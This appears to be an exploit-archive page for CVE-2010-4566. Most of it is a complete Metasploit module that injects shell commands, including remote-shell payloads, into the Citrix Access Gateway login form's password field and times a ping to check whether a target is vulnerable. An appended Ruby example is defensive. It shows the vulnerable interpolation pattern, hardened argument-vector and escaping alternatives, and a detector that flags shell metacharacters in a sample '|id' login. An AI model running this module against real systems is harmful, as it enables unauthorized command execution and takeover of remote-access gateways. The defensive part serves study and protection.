Citrix Access Gateway Command Execution

Published: 04 Mar 2011 00:00:00
Reported by: George D. Gal
Type: packetstorm
Source: packetstormsecurity.com
Views: 39

Citrix Access Gateway Command Execution. The Citrix Access Gateway allows arbitrary command execution through the legacy NTLM authentication module.

Related

| Reporter     | Title                                                      | Published         | Family      |
|--------------|------------------------------------------------------------|-------------------|-------------|
| Circl        | CVE-2010-4566                                              | 22 Dec 2010 00:00 | circl       |
| CVE          | CVE-2010-4566                                              | 14 Jan 2011 22:00 | cve         |
| Cvelist      | CVE-2010-4566                                              | 14 Jan 2011 22:00 | cvelist     |
| Exploit DB   | Citrix Access Gateway - Command Injection                  | 22 Dec 2010 00:00 | exploitdb   |
| Exploit DB   | Citrix Access Gateway - Command Execution (Metasploit)     | 3 Mar 2011 00:00  | exploitdb   |
| exploitpack  | Citrix Access Gateway - Command Injection                  | 22 Dec 2010 00:00 | exploitpack |
| Metasploit   | Citrix Access Gateway Command Execution                    | 3 Mar 2011 20:51  | metasploit  |
| NVD          | CVE-2010-4566                                              | 14 Jan 2011 23:00 | nvd         |
| Packet Storm | Citrix Access Gateway Command Injection                    | 21 Dec 2010 00:00 | packetstorm |
| Prion        | Authentication flaw                                        | 14 Jan 2011 23:00 | prion       |

Code
```ruby
##
# $Id: citrix_access_gateway_exec.rb 11873 2011-03-03 20:51:12Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Citrix Access Gateway Command Execution',
      'Description'    => %q{
        The Citrix Access Gateway provides support for multiple authentication types.
        When utilizing the external legacy NTLM authentication module known as
        ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command
        line utility to verify a user's identity and password. By embedding shell
        metacharacters in the web authentication form it is possible to execute
        arbitrary commands on the Access Gateway.
      },
      'Author'         =>
        [
          'George D. Gal',    # Original advisory
          'Erwin Paternotte', # Exploit module
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11873 $',
      'References'     =>
        [
          [ 'CVE', '2010-4566' ],
          [ 'OSVDB', '70099' ],
          [ 'BID', '45402' ],
          [ 'URL', 'http://www.vsecurity.com/resources/advisory/20101221-1/' ]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'       => 127,
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd cmd_bash',
              'RequiredCmd' => 'generic telnet bash-tcp'
            }
        },
      'DefaultOptions' =>
        {
          'WfsDelay' => 30
        },
      'Platform'       => [ 'unix' ],
      'Arch'           => ARCH_CMD,
      'Targets'        => [[ 'Automatic', { }]],
      'DisclosureDate' => 'Dec 21 2010',
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
      ], self.class)
  end

  # Submit the login form with the command carried in the password field.
  # Returns the HTTP response, or nil if the request timed out.
  def post(command, background)
    username = rand_text_alphanumeric(20)

    if background
      sploit = Rex::Text.uri_encode('|' + command + '&')
    else
      sploit = Rex::Text.uri_encode('|' + command)
    end

    data = "SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit&username="
    data << username
    data << "&password="
    data << sploit

    res = send_request_cgi({
      'uri'    => '/',
      'method' => 'POST',
      'data'   => data
    }, 25)
  end

  def check
    print_status("Attempting to detect if the Citrix Access Gateway is vulnerable...")

    # Time a 'ping localhost' run to determine if the system is vulnerable:
    # a noticeable delay means the submitted command was executed.
    start = Time.now
    post("ping -c 10 127.0.0.1", false)
    elapsed = Time.now - start
    if elapsed >= 3
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    cmd = payload.encoded

    if not post(cmd, true)
      raise RuntimeError, "Unable to execute the desired command"
    end
  end
end
```
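The root cause described in the module is that the gateway hands a form field to the Samba `samedit` utility through a shell, so metacharacters in the field become part of the command line. The Ruby below is an added example, not code from the Metasploit module, from Citrix or from Samba: it contrasts a command built by string interpolation (the vulnerable pattern) with an argument vector that never passes through a shell and with `Shellwords` escaping, and adds a small check a defender can run over decoded form bodies or request logs to flag shell metacharacters in authentication parameters. The `-U user%password` argument layout and the sample form bodies are constructed for the example; the real `samedit` invocation is not on the page.

```ruby
require 'shellwords'
require 'uri'

# Characters a POSIX shell treats specially. Any of them inside a value that
# is interpolated into a command string can alter the command.
SHELL_METACHARS = /[|&;`$()<>\n\\'"]/

# Vulnerable pattern: the untrusted fields are spliced into one string that a
# shell will parse. The '-U user%password' layout is an assumption made for
# this example.
def build_shell_command(username, password)
  "samedit -U #{username}%#{password}"
end

# Hardened pattern: build an argument vector. Kernel#system / Process.spawn
# called with several arguments exec the program directly, so no shell ever
# sees the values and metacharacters stay literal.
def build_argv(username, password)
  ['samedit', '-U', "#{username}%#{password}"]
end

# If a single shell string is unavoidable, escape every untrusted value.
def build_escaped_command(username, password)
  "samedit -U #{Shellwords.escape("#{username}%#{password}")}"
end

# Decode a URL-encoded POST body of the kind the module sends into a hash.
def parse_form(body)
  URI.decode_www_form(body).to_h
end

# Defender-side check: return the names of form parameters whose value
# contains a shell metacharacter. Useful over a WAF log or a request capture.
def suspicious_params(form)
  form.select { |_name, value| value.to_s.match?(SHELL_METACHARS) }.keys
end

if __FILE__ == $0
  # Constructed sample bodies: one benign login, one carrying '|id'.
  benign   = parse_form('LoginType=Explicit&username=jdoe&password=s3cret')
  injected = parse_form('LoginType=Explicit&username=jdoe&password=%7Cid')

  puts "benign flags:   #{suspicious_params(benign).inspect}"
  puts "injected flags: #{suspicious_params(injected).inspect}"
  puts "shell string:   #{build_shell_command(injected['username'], injected['password'])}"
  puts "argv:           #{build_argv(injected['username'], injected['password']).inspect}"
  puts "escaped:        #{build_escaped_command(injected['username'], injected['password'])}"
end
```

With the argument-vector form, the pipe in `jdoe%|id` is delivered to `samedit` as part of a single argument and rejected as a bad credential; with the interpolated string the same input yields a second command. Running `suspicious_params` over decoded form bodies gives a cheap indicator for this class of input.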
